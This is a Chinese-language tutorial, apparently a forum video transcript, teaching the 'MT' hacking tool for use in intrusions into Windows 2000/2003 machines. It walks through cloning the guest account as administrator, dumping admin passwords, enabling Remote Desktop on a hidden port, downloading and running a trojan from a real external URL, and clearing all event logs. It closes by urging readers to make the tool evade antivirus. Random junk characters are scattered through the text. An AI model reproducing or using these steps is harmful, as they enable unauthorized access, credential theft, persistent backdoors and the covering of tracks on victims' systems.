MT详解教程

软件简介：
今天来讲一下MT的详细用法,MT只有40几K,担功能却是非常强大的.很多时候在入
侵时用款小工具能帮忙我们解决很多问题...现在就来详细的讲解一下mt具体应
5 N3 W8 S; h2 G  u0 N8 s用..
1.mt -sysinfo 查看机器配置
先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配置..CPU等..这里显示了本机IP地址,子网,和网关...
2.type c:\boot.in 查看启动文件
这主要是调 用了c:\boot.i 这个文件,就是开机的双启动菜单,通过它来查看本机用的是什么系统.这里多说一个.. VER功能和它也是一样的.它是系统命令..
[boot loader]
9 x+ A4 u$ ^5 g) c( x- htimeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT=Microsoft Windows 2000 Server /fastd
etect
9 g- M& R- k4 f5 `5 n# ]' u8 kC:\ver
Microsoft Windows 2000 [Version 5.00.2195]
看到了吧?2000的系统..
3.mt -clone Administrator guest 意思是把guest克隆为管理员（必需是系统权
5 t/ n3 W/ [( z) m% }7 W2 ?限才能运行）

4 _/ ]. J% X+ q4.mt -chkuser 查看自己机器里是否有克隆的帐户
: ^4 ]+ y) O7 {, b" z用它也可以来查看自己的机器是否被人克隆了帐户..
. ?! H3 F* r* r' ]2 A& _. x& L看到了吧..

4 C7 w& ~$ u, F" c5.mt -findpass 查看管理员密码（仅2000/2003）
$ G* C  V' t* W. Q' i8 Q& a这个功能和一个findpass的功能是一样的.
$ E# {/ x" Y% i( t0 ^) a
, W$ f$ Q  ^; @7 a+ l4 v. pC:\mt -findpass
The logon information :
% ?2 b+ \5 j7 _" C3 v5 C) H Domain : 77AFCF2E775047B
$ B4 S" T. H* n5 b$ d1 @: n Username : Administrator
" k/ o) n( ?5 i! w! E9 e6 d7 u Password : 123
1 h1 l& ]% E0 \  C" E, k看到了吧?我系统的密码就是123
6.mt -pslist 查看进程
+ i, z  w- }5 w6 Q8 d! s% d, q6 E+ ]. Z此功能是在DOS下显示主机现在正在运行的程序.如果是在XP下
我们就可以直接用tasklist 就可以了...担在2000下不技术
. P/ j# i8 G3 l0 Q; L% @* o. q就这样子..看到了吧?
再试个..
关它..
7.mt -pskill 杀除进程
些功能就是杀掉某个进程,这里我们可以试一下.
+ p/ n9 z9 r& S+ @/ X" W8 `( V" l现在我们来关掉932这个进程..
C:\mt -pskill 772
  g# j  v' c+ [# v" p5 OKill process sccuessful!
, V% r9 Z' x# Q, D7 b/ y已经关掉了..
% K- i# u5 X* Z8.mt -setupts 安装终端服务（仅2000/2003好用）
这里说明下,我们平时我们在入侵2000的机器时有时开不了3389,那是因为只有2000服务器版的系统才能开3389,如果不是服务器版的,是开不了3389的,这也是有很多人不问为什么就一直开3389而打不开的原因..
我虚拟机不是服务器的,所以打不开..就是这意思..
9.mt -chgtsp 1030 改终端端口
$ \/ q. I/ K& m( M当我们开了对方机子3389后,主人很容易会发现开放,那我们可以把3389的端口给改这样只有我们自己去用它...
1030 这个改成你想要的端口..
' F  M. ]+ J* h9 H( l8 N, S& y( P10.mt -reboot 重启
不带有任何提示,直接重启....一会我试下..
11.mt -netget http://或者ftp://www.你木马的地址 c:\1.exe 下载木马
: l1 Z2 n( R  J; t" t9 g8 I功能和vget是一样的,我们来试下..
Fail to open registy key...
+ G1 g1 u0 _8 M9 g% v0 @6 I4 eC:\mt -netget http://user.free2.77169.net/didiaoyin/mm.exe c:\mm.exe
7 E. ~& A/ `% ^" z* S9 X8 J7 M8 EDownload File from http://user.free2.77169.net/didiaoyin/mm.exe to c:\
3 t) h9 k) h5 y0 F: G3 pDownload completed 290817 bytes ......
9 z+ L9 L$ ]/ FDownloaded 284.0KB @94.7KB/S in 2sec.
File c:\mm.exe TotalByte : 284 KB.
6 H5 Y' ]/ \9 s% G& e) V看到了吧?现在来看一下..我的鸽子...
! t& m; f3 Q, w' v12.mt -clog all 删除所有应用程序，系统，日志等
这个都明白吧...
* a5 ~7 |& ^" e. [; LC:\mt -clog all
Clean EventLog : Application successful!
" d: J) a6 [$ O( Q% v% yClean EventLog : Security successful!
Clean EventLog : System successful!
这样就把日志都删除了...
13.mt -dlllist 列出进程DLL
格式是mt -dlllist 进程号
* S) `  n( F4 b; J' B这样就可以把对应进程号的进程显示出所有的DLL文件
+ q; v+ e3 u3 q这个在我们查马时很有用..
. C: M- |  y! Y& w+ A0 O1 }此功能目的是列出进程的DLL文件,我们来看下..
14.mt -poweroff 关掉电源。
( q% o: J1 \& _" o5 C2 K) ?: |6 o没什么好说的,直接关机..
8 L, z, l& h0 Y+ R! K  N15.mt -logoff 注销
直接注销.
16.mt -shutdown 关机(都不会有任何提示)
关机..
17.mt -chkts 检查终端信息
没有.
18.mt -remts 卸载终端服务
这个就和刚才的那个8.mt -setupts 是对应的,卸载终端...
2 Q% _% X5 d) |( Ohttp://user.free2.77169.net/didiaoyin/mm.exe
2 O, x2 E* l! R! r. d$ I" t' L( R+ f
3 V' N) U( U  G& Z( `7 ]好了,MT的基本用法就这么多,功能还是很多的...担是现在杀软都杀它..我们要自己做免杀...
# |, l) `% h3 J' m1 Z现在来试下mt -logoff 这个吧,注销,看下效果..关机也是一样的..
看到了吧?不会有任何提示,直接关...
$ `* i% B. z6 s- p2 p好了,今天教程就到这里了..
( W+ A; s. v6 j# O再见...
' H) \9 `# e6 z; O* B下载地址：

2008-8-18 16:50 上传 MT详解教程.rar

文件大小:

未知

下载次数:

0

下载权限:

版本vip会员

VIP专享 检测资源

有些游戏资源需要vip下载开通请点击开通vip

VIP专享,点击开通vip

确认